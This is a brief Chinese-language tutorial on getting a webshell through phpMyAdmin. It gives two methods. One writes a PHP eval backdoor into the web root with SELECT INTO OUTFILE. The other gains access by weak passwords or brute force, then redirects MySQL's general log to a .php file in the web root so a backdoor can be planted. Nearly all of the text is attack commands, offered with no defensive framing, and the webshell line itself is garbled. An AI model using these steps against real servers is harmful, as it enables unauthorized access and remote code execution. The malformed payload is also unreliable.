尝试用phpmyadmin去getshell

PHPmyadmin getshell的方法

1、 show global variables like ‘% secure-file-priv %’如果该参数设置为空或者指定文件夹可以利用，然后写木马，select “<?php @eval($_POST[k];?)>” into outfile “/var/www/html/conf.php”

2、 利用日志文件getshell

常见的日志文件分为业务（常见服务）日志和系统日志

利用phpmyadmin的日志文件去getshell，mysql>5.0会创建日主文件，是全局变量且可读写

（1）通过弱口令或者爆破的方式登陆phpmyadmin，执行sql语句：

select @@datadir;

 

 

 

猜源码存放的位置：D:\phpstudy_pro\www

查看日志状态：show variables like ‘%general%’;

 

 

 

执行命令set global general_log = ‘on’来开启日志记录功能并修改记录的路径和文件名。

 

 

 

再次查看，已开启

 

 

 

 

修改路径

Set global general_log_file=’H:\\webroot\\log.php’

 

 

 

查看，路径已经改变

 

 

 

写入木马即可